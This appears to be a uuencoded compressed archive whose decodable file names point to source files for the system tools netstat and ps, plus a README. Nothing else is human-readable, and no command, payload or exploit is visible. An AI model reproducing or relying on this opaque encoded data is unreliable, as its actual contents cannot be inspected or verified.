      M/;P"S+$S%TZH2AN$E$K3F62JM1P6ID**$RTK+7:&6-*-F?O^3_X<^$/"Q6649CY8[6"AEE"
      MRX3_I%67I%F7P*Z-`HAQ:Y,7>JC&2DIZ$?,G76%*WVH^/VOKQ0NG!YTLYH/:
      MA;HUD:)+)_9R%A<5*8.7\E'N5`I$^VZ:'7?C>E8&/F:HYX]'^^.3(RZ)'5M"
      M%<638GDE^*O.J/>N\TL&Y]4:G->'PY%I*BG4UQHU%1TSH(-BRI1RN!WW^H/A
      M",3,R'B\1L:]7P:=M_UN!F=O#<[;P[W^?K^WET%ZJY%D3-NL-9^#;8IO_'KA
      M\G^BDE968$QT7L1E5IR?%NHJ(V"2OST?0%RP9T;<#^G:"93!F>P",*8$^>_V+8'\SY.+USZ:Q-)>/4;
      M@.(7H\=5`^3X#Z0QGN$-`M`"J[)N#_:C[M'GA'I`^PJ!/G\UEH.N0E\JE.M@
      M]8]+`;=G`V9X];/$-I%IIHF.]:G#W<&\L;/Y7OV'?SOB6V851WCL1J%`2F#*
      M)<,H2Z;!EY2)EI3M,R1A_"5FTB5FW27#$TK:HDMHTAPIZ7HX:B-)/9+;YF6I
      M#R/F)VXW094]\`M8#*4MD0UO2-1G)1ST:$Q@0>,NY!\/WQ
      MH#]\C8%1&P>,MEUO%0K;%?*:AA384;"VY<)S23SUSJ.MK2WR;GI-O,A_'!,O
      MAKD/`_(2MS"3`3^Z]&)G*IAJ#HX-B2/%?X=O*7#QVJ1H=,$BJP"J1]M*;@8J
      M.L-?!N-A;S!*$Y'MQ;68Q[WNSWF8V+X:<[\_&+_K]$>--*KJN!VWN0JWN1IW
      MU'_;8S!I7-6Q&K=[<#CLI?%8XRTXN0QUSVKL@\YP-.YTWZ1Q9?L:S/YPU!MD
      M\%AK!DM48VGHER^)5E_]&N0N-,J,&J)%=J`62K<2YC4CJPAFU@$U!,^!!UXS`'R?>;VW%X[&;LQX%MZ;!<
      M):E[L^6R(B%&T]#Z2:A'^-+=.,H(_Z7\GB;YZ6#?YC>JOXSZLR1U&8"_D#;:
      M#S,.5K,B).YA)6]7)VYW8-8C>J5<:S8C^2W^V-HYM4#DX9E'(AVM]6J62`\2
      M530(E313+@H*DKMFR:RV<8/ZBU?;2.2?N=H^V?NLU3:@_;6K[8<5]?_GBAI!
      MT#<._L(%=OVK+K#_Q/6U"EMW75_K554"];^]H`+F]UY$\;N9__N+J-QQ/"RB
      M'A91#XNHO]$BJB"K8#S&_/E5L)!%>YPN--.%L!EX5Q:[>+;ABXM=)/+/+':/
      M.^\^ZQ1!Y]U#L?M0[/[?%[LJ,(B:4`2'+RQMOU(-"<+>NX;DY\O^]VO(W'$\
      MU)`/->1##?EWK"'Q`;H_L8;4]=MGU9!+W[NZ0Q&)SZ2>ONV\QTKIH#>`EB@:
      M\U-M[-F+"ER*<[OX4PB$/^4#H:I<-`I#Z%I?$XK35H(RXW?'CS0>3-%A)XVC]"GD(YQ_>:*8'R]FGQ$8$#$^
      M0U:NZ,\16*VDM:+J9(:=JCKO4EPFSK:^3U>2Z@2KL-R2/-K*35X6CLB\_-6*
      M.>.@+,^\EO&8!7YDUBU(Y\5*#P/"FO,7)NC+E\6D-2A&\CZ@P6=XV'TS'H[`
      MF=YR,@C#CN+HCOS3(@Q@[]5Q+B)K7X,'J[D<+&A=A[.7QPE:U^`,>S\==;IO
      M>J.\P-O)P.-X_[O4X'7U."9I6"#N$
      M&-D]'`QZW1';==ZN0%*JD!/?"7R?.C'$;OYNA(C,[6OR@1*\JTQ]*)L8(-YS
      MCH(YA=6"?[Z%3=NZ6,3CO,/#<:?;[1V-@(LL'*/T":'^X!7*9V9=$\@0L`V2BABAR6LS$
      M_ER-B[+>P"0`0/)/?*M"0.0E>5VN-$\;T\$+=L%]_>PU['LHY$P$FP"IR7MVO!
      M0P[^<!Y#!%QS8HI#VNIL7#_&G<-UL)?:GAGXGD\[*/A>4LN)ASNS>I5&*U5YB6J-,OA3^^#?5BY<7E59'7O;W#?>YW(LDY,L$QYWUL/Y:["O+PYI,G+;,%5))J@4'K
      M%B/^.%.5;]&1T4C'6E6$+Y,C6_M!%ZE1/:OU@"_5,`\
      MN*5EXF_C::G`N&'N209+M>[#'-5J$5U\@7>`B1N/BR8R\R/URIY/GQ"T3!)U
      M0#2C=&')=RSX'(0732W=8;%%9UJ39
      M0!ZIMQJ52N21WH(&'4FO2>M7/0B64"_3:%)AYJM.S`,2B8V"E/6*&\
      MCW@?8FOMPK0*HU9@9&XV_@-02P,$%`````@`W&92'6?_?4_M&0``YD```!4`
      M``!N971S=&%T+6]L9"]N971S=&%T+F_<6@ETE$6V_A,Z6].A0Q(@*$LCB21(
      M-L0%'DLB22""H=,=%F58VJ2A`Z$3>B&X@(&F1WK:YK5*J_,&11WPX3(\9AYX
      MT$@F(,/B>T^!@XJ*!%3@CP'$!9(,>>;=6_?V1H*XS/&=,SFI_ZM[J^I6U:VZ
      M]];_5\=$2-+#&9(T0I*D/$BO14KB3YLH2;'(2Q^:83;:K#:#+:MLYMV2/OR!Y]:X9DD;(KC,NR:VP/+)4TDE+R>J>[3IO60COY[<[.3L=>Q1]1
      MF'B8!N%#@V7_#F6"Y]@;ZVQ4KWD:LEZOUQV/O-)%*TV(\BHA0>5LM#U((FM(
      MI+L/%KLB]T=)_&<:C@_1:*I?]"+E(DDKCP.2Z]^E,.$D%TERNK^.]@4QB,98
      MK9P,/$&Y)1Y9:G.5G[=?]+(S`L6YA.^Z>'>O\Q'ZI;KRD=KZ"8QFW%NI(]L1%D8L4GD*55EX`[5W[43F=MH'N
      M"3-GR&4L,3=\.%[UZX5J+3QZX2,>'RJMJ2\,:(8\1#1)6:22^Z&XMU&UTU6N
      M)'`.4T/G-5M>!UD/.1GN44()6/OV_8BE<$Q4SM/(Q(%QB
      M'A[C=[/GSD,=91MMY=E6HV599;G1*J59TRJRTVZUIEF5DJV\1K)7U$A+#%55
      MU>4:H\52;5%*%D.MQ/I;=:Y`)4F@1=HQ=\*.E.W8A?/`MV*2,(X48L\%]DX<
      M8/.>"+&%O!ZGU(95]T)5C_-0*^8;,?_L2BT@@`N
      M-'7&8'ZOJ'BE0PC"O%M(TGJ<_XV@-Q5%!JL=[0C*2W6T1:Y\RKT#:_]5!Y7>
      M4,!$.K9(W[YDG^!JRFD,*/6=UB/.(_:H-U&I.MF+,O;@,H@>7,E.W';.(^HU
      M13A%W(I>ECHC7.KH'Y`ZYAI2[64M]WO]\DQA\M3.]W%'7%OFF2O=R[0EZ'7R
      MP2MBE9H?!QE>TWVX3J\+EJ)Y);+"_OSKL1YJY#9Z-F\#BK<0V%::]2KS\MO7
      MG%@V"K7S'>SY$WO?G6AFS8?)E03EVU57+T&V8^RSPJ!MB>YDD=.95D)Q2QS4
      MUYL>@JQI"\B6)3%J%8JX2M\C`B+4X2*B0]LW_CW0/ER_]HR0]@-$3M]-^SIH
      MOW-+F%E-,5K,QBJ-I=INJS0OU-@,]U<9E5*!T0JDP599;=:`L\XV5%18C%:K
      M1J.99+`9:PT/:((<_U]1E6&A5:,S+IAHMB$]W6K4%"\PE(.X[!I+=7DV"L)^
      MC+`*FK2J693@OP+^E5*%<8'!7F63IDN3I,E2B:23"J1[I+3,D;=!;7[BX_8*
      M2E9ET+YW*H1]YUXV_2OXK]`<;;`Q3VK`2[7B^/;QO8)9HJ)=[
      MMONC3@7XOZ9K^;\V"D4^%.R*A-HOZ;6./0J78!3)?Q/EL$G7X":UN6AY*42]
      M+,I4S4M!<&`\ZX%9@@.ZK'YL;03.8#X(\HS:(=&&]CBG7A&^1TM01C"+X#<$
      M%Q%,BFAP2WUUCGT=\GC1E<;1%JUVWHP.SHXN[3'T2X?%C)W6>@R&_'O&\6M:X1K7N+UBYLL\\YGX5<%B.+L/4R#8E&
      M=;[5*A1![$A@#Q7LS:%LA2W.E`;LEABOUS1,E#M#RV.A689@FT/9"<"^1;!G
      MAK(UP,X4[#QBLU[KT/`M6A2D;6LAJT6#`JN]1Z6K/VN_))XV]
      M$O!)0=/`,)96,0:M8DS:K`#@_QA^^FVF7.Q^L*+,\6@]!LM"JU2H+\N_:VJQ
      M?G)A@:2_MV2>OK"D3&1TA1-G2$7%)?-FYA>7Y09R(Z6RXGL*15::.'6:OI">
      MQ)B:KR^;ES]QB@0"RPI+I`D3-.D9TABI>L$".*UEY>1DIU5DP#BDI7:CW8B.
      M(SUM9-;(!7XVN(UPAG%Y37A#NWFQ.1/&'EX-=`">(V#BF2-'6OU/_A=&3X>T
      M>_,"]I\OJ.-#]DY?`D':[XOW'PH/V9"IX\)+?W.N@66F8?<^]Q/;=
      MT7:5?1>@.&=;F]_*:\5!3LM&?O.E\/`&,EH/0Y=1;Z!YE\K18C#"P%&R2^D\
      M:-NL+Q4&CHPB^8OOP@Q\;:B!'_B.#+S&?W[4RCN0M>][-O`=L-D\OD9T'3Y5
      M.YXOZC#OC,6\#Z?F\BD@O_M,I&O'1>AOU3Z,'6XGYL6IU^64VD4HW>?,:Q<&
      MF(3@\2$%%HJ4UN-+)BJ%J`%$:8A*)2J=J!%$Y1`UBJ@[B1J+E&E@'(X`NW5+
      M6G`N#I'OD#_^E@Z/8QWC'A/'U!@>DU\W??7@C4QWQP7\GS@D)3BN*-7K-L)L
      M'+MP#!$VY7XGCDD2,`_OJ/L``
      M8*K'V?`T=G^-TU"$SFPKL'BT(\1H,Z\Q6B>VW17[,T>;>MW1/A4R6M)P4NAH
      MB25]S4H7^UJ]IBX"-RM:$6S+;X5!(M&9ZLQ1^_?3?,C5<6H,20D)P31?'=R?
      MZ@:R53?9JFD7;L_MP4.LNL&'Y3JW,UE4$[:<>T2G;1J1"O[GTZ@"I22=:'><
      MB_UT0*KIW?#-V%7^==J?CD/'E(-HC[#E-!\)?T%PM/>P/>1H5ZC7/"&%:Y[^2+QC3ZR.
      MC#3$E+N4"XN5W[E`K\;"66OE^@NXPR^V\9NK;7I+<6A[_$P1_`JQ3K15C1:V
      M;!\.G867F_WE:#UV)6DAPC]S_G01T(+S"K[ACQ-JLM\9B`U"KWK>Y&ZGBE8Q
      ME2@1'$P#80'D"-&99M7W"G$:>J*=3D,GV[HY#>$+/;[57_4#L=?DWYSP2)4"/GH*MI
      M[8%KG0HNGNMZ*M@8=BIX]US8J6!UZ*G@+^?H5+"H,_0=F,\'OG.AYX,]BG^B
      M\\&;+7@^V"_LGQ;S1Y\4'FGADT*<>MV+/;H]*3#+WB\DT+>H@_JMOR6Q2WR=
      M=:Y+?"T\QZY^`[GZ4=";:49(6%WS5?>!ZOB7OW987?1EE[`Z$U@\6@JK'USH
      M?K197_[:8?6MYBYA]>7F\+#J"@VK':%AU=NWR_M]([!.):\>+N%!B`_FS7>"$*QISUQXLE7>+%H+/7BA>*L]>+%Y^=
      MN5Z\:#QSO7CQW)EKQXO59WX@7AC/A,:+)_Z9XL7O3O_L>#'M=#!>6&"1A/,/
      M>:L,#P.E9[J$@?%GV#5YR35E8A@PA82!%_=AC8\7F7,/#BY^%A8'5H&+@4%@8&!#UD(^1/O60)L,O%'0:X?JVEVE;MOYV@JPKQ5_9`C3'D
      M$D.CMQELH0RMP692^K_+AMU:S!(A170]88*DGS9QRCQ]F:XP_Q[*%TS2^;.Z
      M_)F<*6".OK!4FS]Q2F$9D9R?7C*E9-K,$JE(5UC(7UZ+2R8!>^*TDI+"B66%
      M!1+GD!UD%A3K0_BS)4W^Q(D::8Y$]R69(ASFYF`V][;`DZ]/*/YI8\/CWR",
      M?R=#[]3M_8@[[J0_^-VJ$-LL_'YDT$F.?]M:KXY_)X/W(W0MSV&OI0F]1NC%
      M"(:]T+N1@TU\-X)"Q=W(*WPW@HPB^>6FL*#G"0UZGB8*>G9_T./.95N3"'BF
      M>W%6"X$PU6)N#M7'(*C%>?G$[:^O$3KR>/#&U^7!&PB/0MRC>+RX.UV^G:V!
      ML+>]%2\QL)7D]F"S4H_S0"O=\A(<(CA*<(S@.()IQR#T<"C"G:AS.%$LA#&D
      M.^2W3]!GT53_/`?HW1ZLX8XK#0E9&TYPR(I2KUL9B=%J+]0Y.@A](78IP5N^
      M8+V'?8DQ37:T@8?$M0;?N&U(^!'Y)-`7(4DW25(")`VDO*M2SDW!-@T?#@K[
      MOMGP^:"P[YL-%P:%N;R&UD%AWS<;I,%AWS<;U(/#OF\VW#@8IX(J5:@?72?<
      M.A(P]/DXC#I\0-H&J1'2H9O"YU,_='#X]]>10%]V'FG%]\!)]>E8&GI`K!\_
      M./S[:W'X^.KUX>.KQ_$ML.ZMJ!.M>/&4+'Z(XO9A!9V\FUJ8*D.D_`EXW7^[@IK^#S>V`C[G.98K
      MHNQ#\,L/[TUYR7'_=Z3K?/RQ-_@__-SB%N:@T\_@0;A]N(EU;@]NJU+38AB>
      MW.YZCE**RS1H#%55
      M&FMU^6(HU:3;RFMNL5?49&!1.;AWLZW27&VW:JHJ\:IZ(;+-&JNINA8OK&NK
      M+8LU9ON2^XT6*\0$J\UHJ-!4+]"8#4N,5JQ:355ME4N,%@WV36P+L1=W>RD>
      MEVFC8AP7WE3!(,S&<@XP<9GV8"E^N*JIMM@$OS;(QY<4YOOW"_Z^*3[5;[TG
      M/@9'-"Q`OH?D70&R$8N@WW)0H/%9C1KQE:4
      MWUZY-`_4:\_-,MJ,Y5D0##,7&RQ55HO=9,RJ,(Z7(,Q@I,D'+2TS:HI%=#;:
      MPC7G#\WERS)+-7JCN0)@:G4Y!/'\JW]D4%1M,58N-%]=D"ZB=H90*NA3_%S*
      M/4S_J[)3K/Q*>W[0I#:+-#/GACX2#']NI7G,8]KIBM[JAT=$VNK8)',CS
      M-T.X29>DY3?__R?O,,)M@(W#?ER;0U#O9$C=BYR78$X)D#20-@S#W^`%?6)G
      M%-X`=49M$$]\36D^'/JCFLZH.N3M\O,ZHS#Z-/\I2.//9IJ?#=)X_&[V!.GU
      M2*\(TMA?\Y(@C3TWS_'3IFUIZ,?P)X0ZTP7(R^]\B'ZC^3;Z059GU/-8/]-?
      M7ZX'M[+S>SR1)&$-Q[CU(CK>@65-GXJ8.:Z.W@@N2OC+'K53!EP4(2_]4)PK
      M6HZ%Q@?'N.=#VE\.:[^-VV^A]KG=M9?='V$;K(9O^%[3)9Q#-%0U)<)2R!T?
      M\&%%?!BTQ_&KH2V.K^)L/>6,4R3!/I%K`2^MF7G9_@8]Y?ROF'8]OLN6C67NDG_(V&U$N2XO-QYI*D*@),`)P""/YDUZ><`X14S_A@@G(3B(WJ0O@;TH/)TP,&X#DQ7]:!^5@)J8!Y/,W\/\X\"
      MPG%-=9;Y?17$3U>((YP*C^TXOGP%E1?!8RC0)D`(!/%_4-"X7^7RO8P?*JB_
      M4XQGF?\-8ZM"_+Y7T:$@_<1$$?^&*!I/*N-PYH]DO".*VHV-HG:3F']?%(VW
      M@G$1\RV,M=SN86ZWBNEYT51>$4WSJF3:S+25Z>6,*Z)I/59'"S>I6L?\)Z-I
      M71JB:3W^"Q!L3'6$ZQV+IO4ZS?377*]?#.G[CAC2REC+
      M_+5,KV-Z(].;F7Z=Z;>8EID^'TOZNQQ+XYNG9#TS5BI)CTN5-)\5S%^M)#T^
      MIR3]O*JD]G_A>CN5I,=WF/Z`ZUU6DAY3>I(>A_0D/0[O27*S>Y(>1_4D/>;W
      MI/:3>I(>U_:D?IYD5*JHW4TJTF>FBN2-8RSF\A(5KX^*Y+J8[V58P%C),9IS)J&(KQ`N/?U33.C`2B;TL@VL"TG7$5\W\/F`7K
      M^\<$BFQ/>Q#@2,!OW&6`.H)'YYMX4EYQ,KV-Z8V_J9POS
      M_X-Q.^/;7'ZY-XWO2F^R+T4B[=?J1.+;&!]()/M:E4C[W,/\)Q+)OK8FDMW4
      M<_L]7.]`(MG7"::_Y'JJ)+*OK"2RKSN2:#WSDDAN81+9P=U)9`>&)&J_,(GL
      M:TL2^RG&X;O9KS(]3N83NY#J.E#
      MZ_=;II_H0_MP,^,KS-_#^"[7']67]U]?WN>,O^G+\9G+O8SK&9]AW,#X/.,F
      MQBV,KS%N8]S.>(@QHA]A+\9\QA+&^_K1.%U,^YC>S?3[C*>8/S2%Z/04VB^Y
      M*:3_C6PKMEU[]B;ZA/]4;
      MVY_VR]S^M%\6]B?]U?1G.^M/Z_I@?UK7Q_^O:;,-C:,(X_A>6J%%/S2V'\SE
      MY?8\TUS!IC5*6VD_-&WQM=A":RQI9'*YV\M=>]G=WEU*HR)1JE9%C,6:*M$&
      M&R'"J8E$*1+Z(OD0L9`H#191,%6QH(*5HA4M.'//[YH-)+__\Y]G9V9WYFYS
      MLS<2UPV2=M'.8\@'X.CP.A^`P'(&C
      ML`3'X`2/];`/&E@GC0P3R+T#[X?D7GR
      M843&ZS/\,Q'F281Y$F&>D''JVC.>S''_$EGDR0-XQ6_K]%O$)XAE;^O$MK(]*^;U1F4?;HM)>&_[>J+37
      M&97V#N*_"(?A&)R`I^`D/`NGX#0\#V?A!3@/K\#0[<)J&(5WP5:X%W;"%,S`
      M'/3A,_`U>`*.PW/P*S@/+\/K<&E,YON:F,0;B;<2[R!^-";W+163^Z43D_M9
      M#W$?\:LQN4\.D?\>?@F.PTG*+]'.+S$9YZLQ&=\5C>+7-,HX-C3*.,;PX_BK
      M\5OPU^-OPF_%OP__8?Q=^'OP'\?OPN_&S^$?P#^(_R1^/_YS^"_A'\4?Q!_"
      MSZVTK'6:?2NEO%]SO;E>Q,-P!(["$AR#$_`4G(1GX12`M5U&NQ7K-86/Y9'M#Z96'IC[CEOZ4_VO@GX"\)+>CJ
      MD.3X599E!_QX0#<']#KTYB']6]$U(>LA]+!^4]X=R.\(Z%1(]G";+80>[9HG
      MH$^@=^H!?SZT<(X#E?KUC?F-0#TG`[H4T!.5>O1G_].!>J8".3,!_0WYG?HS
      MS7RE/_J?CE\KVCS:0R_3$^QZ)5^_1RVJ6JCGYH!>'M!AK;N3R1:5]'K\;,Y)
      M-5M*J6ZW]X:ADI9J<_*%K.=:*IU+=*ND6T2EG"Z4ZU4\SZ\H\YTUE->+,EO`
      M1)FO/Z/<0Y9R=>WYM,HDDOLM)?N<+951Q1Z=94QEGH+I`SS?,?WPR=3EJE#,
      M:Z?;*18LH_WRWZ*W'^;*3/I]ECK0Z^3[5,8S->E\([KZS#Y/G>+GLVXQK3OA
      M)%+JQBYLY9:6M>5658%\LU%49=VT9X[PDJ)R65>7J0=WZ$ZG=-O*G"SUF=-(%*5UR(>1KA%P*P[C08"J$
      M`DLNN.'2G679_/(UT!2!U5BX&$*6[\U5&E-8,NW*N#:*+ZTO#`!&$H0TD%=,
      MK+"1KVQM47]SQ;Z-1U3:R6MR\_W\XK.GH"(_@WZ?]`?AKT'X^VJ'(VLJJ:[)
      M6&$!:>"B!-SCID;Q`_YLV=J\X(WUWT"L@XU="32!5*N_KC;L]7KGS4@(BRRB
      M=XO;)%VXKF
      M\E*CL74W'$[23.8W)#BII3>?+T31K#5/NR2\DIL/].3QK
      MCU_3/!TEF;^>[6C!:S^U/HK-II.AV^."#OW,M9*Y7V1H\J.A6SD?'4A;G)33
      MZ&E?*K8]F9DFSP>A@K^=3&VVN9_;M=%6^ZWNV:[-CN+'=OD%OOXG'U!+`P04
      M````"`!995(=SOW:@PT!``!#`@``$@```&YE='-T870M;VQD+U)%041-1970
      M76N#,!0&X/O\BO(#W&Z3^_W"=(,
      MY2XM<$@>BS3/D#\@2\JBC,N[F?N&M[*F+2ACBH_CG`8F5;R3FO^(0PL/4NDY
      M6MK2RE8F>\K2"J.L7[C&0'5#"'^GW7">D_CP@[43^C!GN\#N3$;0MC7?U;+O
      M>:V%[$<R,<*JJNEP2?#V$MT[@?2MAVKJNH:4%2(BUYWG`?UJXC#DQLD04
      M13=_Z-]_G_!%D14K]60$``,`"```*````<',O86QL;V,N8ZU034L#,1`]FU_QK`C;LJRT-ZV*
      MT$-1\0/4@]#+=C/KCJ3)DF2E5?K?G>ZN2N\.(9,W'V]>YF3T/[90HX.9JS>>
      MWZJ(9#;$^/1T@N4&=UQ4.1G<9KAQE0W.IGCO'JNKT-C`D;+&%AGIYF`D-#^V
      M>S]7'%"R(8BO35Z01F,U><2*4#BK.;*S`:YL(_/[%]3-TG#1MHLG&RC%!_D@
      M=9BD`8\$76#9@^/K]?W\[:_E&*VJ050.E/AQKC-9%;HPKD@[5
      MCJU\-Y7/1`3^I"&^E`*Z+#S%Z0YRB:0O':+T1+]HVFNV*!GGNTZA.M8+.^AYIBT)K3DFXQ9L02903RZC
      M&V\[M9)26]G2-U!+`P04````"`!AA4L=81V![NP,``#_)@``#````'!S+V-O
      M;7!A0%'N-"_[L)J.-SS$=W#NYP#7I
      M8#!XHI,P+B,E#M)\MCH0_'LZX=5I?D7RT<)ZV=PQ(VX5HG*9"S2,DL--J5U>AJK6S@E-&M(`D9E$I(I
      MQ2NADUN5%"J:#7*3%5>12HN594C0"!`$
      MYI96%F66"+(C;6"62\2/6.LHBE4K0J07=+3:6HPH4+M3KZ+FVL63U:*212HY%\&7F4W$Y/.2EJ2L2@7.N8E]NTU:BE
      M3?(QP]$KL9*(VD2N.:G4FG6;"%10/[TBHW)2-J3TISBFU=MAYK#CF8M&RF+(
      MR*D:QE@<<577"4HOHNP//,?ZAAQD5:)<1'1TT^UR/+HU.IH(&0C[C\7X].X?
      MSO"!X'\M9.;^M=(KQ'I+%EB3'#&JAQA.WPQM1H"Q>1&PCE4)!QC*.H7P?>7
      M`U>KJ6#FN7&!D7>L^F@6%]Y:BW0DX
      M1&NSG='ZBCR9*4FA;Y.=;'X=FP6,#BX+%4H*D=])J]&_QAR<*&"%BP6YY]F3*E"VFRT8#\;SP8``GEP[627N!E42ZH"MB&YA4PE^'VEQ*H[G0HNO
      MV\(*?714(;G.6QC6=D37EYBCNA)KB$Q=9%[C8;U1Q>,Q-AS7;^CG`MZ3[7[0
      M>G,\']RSRVLW4L6+-05O7^WCB*9\6RL:3^J!T$ULQ!I361F"N1(CS:$C+^YG%MJ8#EP]UJG35F(G1,M:I.`DP1:`)N,0<4]#!.&FFIB23RF$E!&68
      M&>X5(?(S,IL$R0+WE6CL:%IH0R,JF,4VQ4Z/V2&N1BHNJLYD=IZE1H\!2"6L
      MI3`8I"2-04^>T-Y/[-0F7KP^OWI[\>OH[-O7/XPYXLBE6"2(,O(M-YF(\T#L
      MT'X9WWUHN]Y.SZ/1Y'P\?5ZQ"A!RO[2>Q_,/%"!M.5Z=7>R10_Q-02AV_>V1
      M*YW]*VFG)W.Q%_5\'TK4J#K>A:?0VXMO+UX_H-)G:Y07LEC/=O3RR0]JU^'P
      M_&$.>S5%^'YO=:6@&WWQ[\=CJV&3TQM=<$(*N3#H=BZ^>HS#9ZNN`FJX=*9(2HPNDR'-PPCSCFDT5V.$ZH@%C
      M7!.0*-FX_7I,FE3Q1T908V&SLUI4%-N0:=6J4D?C^B'U'ORGZRQMGM"/2,`9K6K95RT5-FAK.7'[I**
      MTMJ,=,#)R-M+%U<8-.(K/FPU^%NJI)SQ?9;%>[ZC#MJ+C0O<-:G\O
      MW2+P-[SIOKK)BYLKE:?]=+U#WX0X7C.QJ2Q6C>89QVT,;TG1IN4K3%>L7D,K
      MLKQBWQ#C/F+42[1&)J(K=I13@D\].&LK:F#4],6-VJ(!BO](G6'DRU6\G*I/
      M:2P3:D3;&3-Q2<^C8IE85@W]2_!A&Z
      M/=J`>@_A(2`Z(;XA!!?(%H813&PA7,C4("J@.X(1471`3K9WK(WND0U$7S:'
      M2`F1]B'2/8AS1G0@%N%!&L0U(U#2=Q$@]B$,6\R6?=^/CKB#*)RY=O4`L5>/
      MEXR@YM'U"A-[$#=L7:J77003>Q`_6<_W(/(]B(\<79U-;'1YFS2('QF1]R'R
      M#J(=6J[-=;+$$FM$*[2V[$37!RN4=:(C=@6[<&'O^J3%5&'OB#V"V1;:4<42
      MA2=8&^0ZK*^-(^X%U?W7P:J=+'$_B'NS9X**V&.W)8&X=W=#@(D](;`FA&OF
      MOD*.N(-(;$GR(:XDM2$-XC7O8:>!SAZ6N+/'F=W#A[@]VI#&FUR,W73A[^&(
      M?6&F">2-'P?N7LPCM@2[)01/)ET#,[''P!DA,*SLU@H06Z1.8%;CC:=\16RK
      MTBG[;O;9B7^^/^T%56.1MU-%?'@GGID8U]J)B;V@:IKR=JJ(^W:J1JT>D-X+
      MXCFLZR$FMNS="H3<)IOGU2K96EYMN?57=I(;Y7PG.6(7\9;WH$%OISP3<5\@
      M8`SL:3.9'SI=_>,^4/P7H*@/%/T5J/`P#E2('9"SPH?C87!@;W]IOK3@LW<_
      M_RS\W_W@?CX8T%V;B$H[AN5\!^?=N[6NVTYQXJ4135_.JF&4[MKJ^[`E.D=2
      M+#$'1BK+(/EA/GUS&(I`3*E`K07;$P.(QW<(),JMWV^[F6KIOIR^?0GR;
      M4V>R-X5W?)\8M.XZ@^9BD^_X%C)'.^(/);*Z;7)W3_39I_Z*(-X?32\E_5G0
      MGW`VXPLTOA60P2((`U#$0A&^FMFYF80F0ZRGQEZI%<9]7M9A&6.&)RF)#\W/
      M?!^VJC1":QU.AR)/5:B7_+U,UI_M^$3"5\Z23R;0^JBZ]B9N]#4`[+;%"CA[
      M0ZYIH4KY%CV!6+$Q-\1T(7&&"55$^B#^*%[XT\45VP^BC.BL,2&A.G>YB?K$
      M5[&G)TU\S<4$"\5<'!VU`)6#^=WI*>OUYY^B?CP:ME?VK/;O:^E7;8Z3QO1D
      M[KUF&/\]$IU7H4D*G92JH=XWD8\S474=_5"&=,7SUNX*ND"#O/%OHA_[$*C^
      MJ"?FD2:<36G^3"0XA)889:J3*))1'-*MTKE!L"]TK`NM^'O/LP]4T$FVL:]Z
      M4QXZ+YK+M<8H0L6(LKO!$[W$J5A\_\-W[UX^*"0+9C^G'D;/6,3#/!!UWHE#
      M$9%D;GUSU>^7AMJMD/$)74(O/5']:_Z&"9TW'1N\G>]BFOQO0$='!*LV]$&M
      MZ#KIQDK/EX$F:>BDS9FSFS66P*5KWDXC^M##CMG-J,C\3Q*HELA7GWZ?F5MM
      MCJ,1V^!4)Y'Z-`*K8!@,QV/Z+D,-#IY_U)75_E#XF05-`8"(2&'&T_1=W?7-
      M2N]Z-U_KB=V7>NN\YECU6-7Z_\J,QFV.K:]4G;)P=*1WRX)C07JU0WM,CCC^
      MS/+0!OS=*I'OKQ+_9T7B]'-*Q.G#!>)TISS0SV8)AQOG"04:QX$.)&PJHISY,2YHG-(F&P.1D*A
      MY)0G#"+TJQ@H%B%V-,H8`X4-DA\P:9<'',(LTKAD4610SBB>1=IUS@:2@
      M,QY3Q&0>2S'%',A5E&(V%"YF^,I`ADD8RZ*0,Q0IMCU3W%3<-9G<&GF+>*X'
      M"MGA@@&R.J-0\@AIS!GQ+.ZJZ+BQD7TN$34#2BLC@=\:F+/.(;>2-JL\$.DVY0)(LH95'2E5/9)DEY!)'
      M0^8Y1HH66*XFL[?1'5IF[!E.]QI.0_S#W_WASF"X@^PV8T?Z;_@#`F+*`]=[
      M!F/78@QZ8;\W0(Q^,.SWA^%@&>."Y7):H6341@5335^F2N:0SV&FI!AO,V'+
      M:`S+"Z.)RY0_P*SVVW.<'[F(LQ*;[QB!RH=>JOW):4NJY[JG362>2A.N5H1&
      M(9VKLH1+$CD$PF-[$("*-4^N;T[6-\Z2Y7&F`6ZUY6)\XQ&\?BA@8_W(<7J=
      M>IS(2@]I@0^.II89&](/6'KJG5H/GVDIZ!@S5@6Z4QU15%78Y(,0C[@YW=O?V#PV@48Q<3)U/);3?0"8,1N(W)O`L<1PUW
      M/.>+`\!3<'$!)R>P'7J.S<*HN)B[I+L.+V'=.T(QR_!\:2D'3W61IF=TCV%O
      MQX,OE7:!#6%2JP[KTQ=!/UGOVEC([%ME6*D^FH?]@\9^%4'7"%9SFQQ9H!4H
      M6X+KX`:IVBJVCEJRD&26[VL+<7H*&.LF!.'^35NO7^DAW=>DUE;XYE0?4AN0
      M6G#D?',<7AUGS?F^8+\B'>H*%EWHW%!^C0F$,UUW:PC))99N\TE&,KK^%>B;<`-2J,RO3(62.LE-9N
      MT(5-E'GP0]5L:^1*,5,JX:+K0B--+ZA5-CGAUD[YDZ1;:/J[T7["!OP?P&()D$:B7-N!W;HC
      M"?"^O8==UZV[L.7,=0OL>&OIP?$Q]>U7<.^M#"V\)X&X!)@7]>386:WF&+ZB
      MX[/"&I1:FG0HXQ75K>8S+PZU'YU:X32IU%#:AIPS:";/M]0[?31#.67.?
      MYQ)Y7NAYWTMJU96MCL2!KP;:7N*+8:>A;`:^?7*GAG:N^[M[-T=$Z`39TD"O
      M$"3O5F\CM7U#7GNN]*@^*.K3M\+#PO70?Z\9;=K$H6LVFWB.%N$LMC;UJ,7K
      MY>W9Y2^_7;AZ1`.)_S\PKSKK'WNW=:\T&&_/WKUO;&B(EQO0,K:,L1K[XJ9I
      M;.J:5`H>D?P?4$L#!!0````(`'.>2QW)ZQYI=P0``-<+```(````<',O9FEX
      M+F.]5EEOXS80?I9^Q6R*NI*M.));(,%JY9?6!A8-TH=TGU(CD"7*)F)3!DDE
      M<1;Y[YTA1?FHD^T!U#`DS7".;PX.>='WH>]5_)G)84&?\RU\+ADR@"@NU(9+
      M5D(M0#7K80&Y*.$VYT+?ZES#:!BCV(7O?\=%L6I*!I_45EWH[8:IX7)\Q%:H
      M\E>NYFMVQ-4EKP]9C>#()9Z_1N\0Y')11/AX#'T$XQ&9^L4REUZ_3^S4_^I[
      MC5!\(0B^Y(O[0A91T4C)A#;?FJTWZ9X0:4/)JRJ)Z#F*YDUU-XIG*&,,(UA4
      M45K>);'AXF=3:/`H+J`'*G1LC^)ZS%=0TR:*_C420
      M5="E*CHK-O"]PO]9Y%R9]X\S,F[E=N*&]TT;HYFS]88-WS-ES`(75"]^GD[#
